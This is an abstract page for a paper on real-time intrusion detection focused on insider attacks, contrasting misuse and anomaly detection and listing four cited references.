Real-Time Intrusion Detection with Emphasis on Insider Attacks
暂无分享,去创建一个
Securing the cyberspace from attacks is critical to the economy and well being of any country. During the past few years, threats to cyberspace have risen dramatically. It is impossible to close all security loopholes in a computer system by building firewalls or using cryptographic techniques. As a result, intrusion detection has emerged as a key technique for cyber security. Currently there are more than 100 commercial tools and research prototypes for intrusion detection. These can be largely classified as either misuse or anomaly detection systems. While misuse detection looks for specific signs by comparing the current activity against a database of known activity, anomaly detection works by generating a reference line based on the system model and signaling significant deviations from it as intrusions. Both approaches rely on audit trails, which can be very huge. Moreover, conventionally they are off-line and offer little in terms of strong deterrence in the face of attacks.
[1] Marc Dacier,et al. Towards a taxonomy of intrusion-detection systems , 1999, Comput. Networks.
[2] Kevin A. Kwiat,et al. An analytical framework for reasoning about intrusions , 2001, Proceedings 20th IEEE Symposium on Reliable Distributed Systems.
[3] Shambhu Upadhyaya,et al. Towards the scalable implementation of a user level anomaly detection system , 2002, MILCOM 2002. Proceedings.
[4] Dorothy E. Denning,et al. An Intrusion-Detection Model , 1987, IEEE Transactions on Software Engineering.